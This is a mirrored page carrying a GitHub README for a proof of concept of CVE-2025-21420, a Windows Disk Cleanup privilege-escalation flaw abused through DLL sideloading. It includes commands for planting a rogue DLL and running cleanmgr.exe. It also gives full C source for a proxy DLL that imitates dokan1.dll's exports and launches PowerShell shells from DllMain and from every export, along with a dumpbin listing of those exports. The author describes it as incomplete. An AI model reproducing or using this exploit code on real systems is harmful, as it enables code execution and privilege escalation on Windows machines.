Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-21420 PoC — Microsoft Windows 后置链接漏洞

Source
https://github.com/Network-Sec/CVE-2025-21420-PoC
Associated Vulnerability
Title:Microsoft Windows 后置链接漏洞 (CVE-2025-21420)
Description:Microsoft Windows是美国微软(Microsoft)公司的一套个人设备使用的操作系统。 Microsoft Windows存在后置链接漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows Server 2022 (Server Core installation),Windows Server 2022,Windows Server 2019 (Server Core installation),Windows 10 Version 21H2 for x64-based
Description
We found a way to DLL sideload with cleanmgr.exe
Readme
# CVE-2025-21420 PoC
(Windows Disk Cleanup Tool Elevation of Privilege Vulnerability)  

AFAIK, albeit incomplete, this is the first PoC to this CVE.

- https://nvd.nist.gov/vuln/detail/CVE-2025-21420
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21420 
  
We found a way to DLL sideload with cleanmgr.exe

```powershell
$ cp .\dokan1.dll C:\Users\<username>\System32\System32\System32\dokannp1.dll
$ cleanmgr /sageset:2
```
Just use regular `DLL Sideloading` and it will rain shellz. We have not yet tested, if it's sufficient to have the second dll name only, or if the first, slightly different one, is also used (may have mistaken the names at first look in ProcMon due to small font size). 

Currently still working on the **PrivEsc** part, but it's very likely just scheduling `cleanmgr.exe` for `NT-Authority\System` or waiting till it's triggered by the system, e.g. by **Filling a Disk** or creating too many temp files. 

Warning: The following is still `Research Level` (meaning, total crap code), it will pop hundreds of Message Boxes and shells. The same can be done with much less code. 
```c
#include <stdio.h>
#include "pch.h"
#include <stdlib.h>
#include <windows.h>


__declspec(dllexport) void DokanDebugMode();
__declspec(dllexport) void DokanDriverVersion();
__declspec(dllexport) void DokanGetMountPointList();
__declspec(dllexport) void DokanIsNameInExpression();
__declspec(dllexport) void DokanMain();
__declspec(dllexport) void DokanMapKernelToUserCreateFileFlags();
__declspec(dllexport) void DokanNetworkProviderInstall();
__declspec(dllexport) void DokanNetworkProviderUninstall();
__declspec(dllexport) void DokanNotifyCreate();
__declspec(dllexport) void DokanNotifyDelete();
__declspec(dllexport) void DokanNotifyRename();
__declspec(dllexport) void DokanNotifyUpdate();
__declspec(dllexport) void DokanNotifyXAttrUpdate();
__declspec(dllexport) void DokanNtStatusFromWin32();
__declspec(dllexport) void DokanOpenRequestorToken();
__declspec(dllexport) void DokanReleaseMountPointList();
__declspec(dllexport) void DokanRemoveMountPoint();
__declspec(dllexport) void DokanResetTimeout();
__declspec(dllexport) void DokanServiceDelete();
__declspec(dllexport) void DokanServiceInstall();
__declspec(dllexport) void DokanSetDebugMode();
__declspec(dllexport) void DokanUnmount();
__declspec(dllexport) void DokanUseStdErr();
__declspec(dllexport) void DokanVersion();

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved)
{
    
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    default:
        DokanMain();
        break;
    }
    return TRUE;
}

void DokanMain() {
    MessageBoxW(NULL, L"Hello World2", L"DLL Message", MB_OK);
    system("powershell.exe");
    HANDLE hThread = NULL;

    wchar_t cmdLine[] = L"powershell.exe"; 
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };

    si.cb = sizeof(si);

    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)DokanDebugMode, NULL, 0, NULL);
    return;
}

void DokanDebugMode() {  DokanMain(); return;};
void DokanDriverVersion() {  DokanMain(); return;};
void DokanGetMountPointList() {  DokanMain(); return;};
void DokanIsNameInExpression() {  DokanMain(); return;};
void DokanMapKernelToUserCreateFileFlags() {  DokanMain(); return;};
void DokanNetworkProviderInstall() {  DokanMain(); return;};
void DokanNetworkProviderUninstall() {  DokanMain(); return;};
void DokanNotifyCreate() {  DokanMain(); return;};
void DokanNotifyDelete() {  DokanMain(); return;};
void DokanNotifyRename() {  DokanMain(); return;};
void DokanNotifyUpdate() {  DokanMain(); return;};
void DokanNotifyXAttrUpdate() {  DokanMain(); return;};
void DokanNtStatusFromWin32() {  DokanMain(); return;};
void DokanOpenRequestorToken() {  DokanMain(); return;};
void DokanReleaseMountPointList() {  DokanMain(); return;};
void DokanRemoveMountPoint() {  DokanMain(); return;};
void DokanResetTimeout() {  DokanMain(); return;};
void DokanServiceDelete() {  DokanMain(); return;};
void DokanServiceInstall() {  DokanMain(); return;};
void DokanSetDebugMode() {  DokanMain(); return;};
void DokanUnmount() {  DokanMain(); return;};
void DokanUseStdErr() {  DokanMain(); return;};
void DokanVersion() {  DokanMain(); return;};
```

## Some Background
![CVE-2025-21420-DLL-Sideloading](https://github.com/user-attachments/assets/123038f6-e4bd-44ab-a742-ce30c888ead4)

```powershell
$ dumpbin /exports C:\Windows\System32\dokan1.dll
Microsoft (R) COFF/PE Dumper Version 14.34.31937.0
Copyright (C) Microsoft Corporation.  All rights reserved.


Dump of file C:\Windows\System32\dokan1.dll

File Type: DLL


    ordinal hint RVA      name

          1    0 00004E40 DokanDebugMode
          2    1 0000F760 DokanDriverVersion
          3    2 00006F00 DokanGetMountPointList
          4    3 000045F0 DokanIsNameInExpression
          5    4 000052E0 DokanMain
          6    5 00007230 DokanMapKernelToUserCreateFileFlags
          7    6 000098F0 DokanNetworkProviderInstall
          8    7 00009B70 DokanNetworkProviderUninstall
          9    8 00007530 DokanNotifyCreate
         10    9 00007550 DokanNotifyDelete
         11    A 00007590 DokanNotifyRename
         12    B 00007570 DokanNotifyUpdate
         13    C 00007580 DokanNotifyXAttrUpdate
         14    D 0000AB80 DokanNtStatusFromWin32
         15    E 00001340 DokanOpenRequestorToken
         16    F 00007160 DokanReleaseMountPointList
         17   10 0000A9F0 DokanRemoveMountPoint
         18   11 0000F430 DokanResetTimeout
         19   12 00009790 DokanServiceDelete
         20   13 00009650 DokanServiceInstall
         21   14 00006BE0 DokanSetDebugMode
         22   15 00009870 DokanUnmount
         23   16 00004E30 DokanUseStdErr
         24   17 0000F750 DokanVersion

  Summary
        6000 .pdata
       15000 .rdata
        1000 .reloc
        1000 .rsrc
       60000 .text
        1000 _RDATA
```
File Snapshot

 [4.0K]  /data/pocs/4740a9ddbfa689fd1c73a344224e8a90f70b3986
├── [6.9K]  LICENSE
└── [5.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.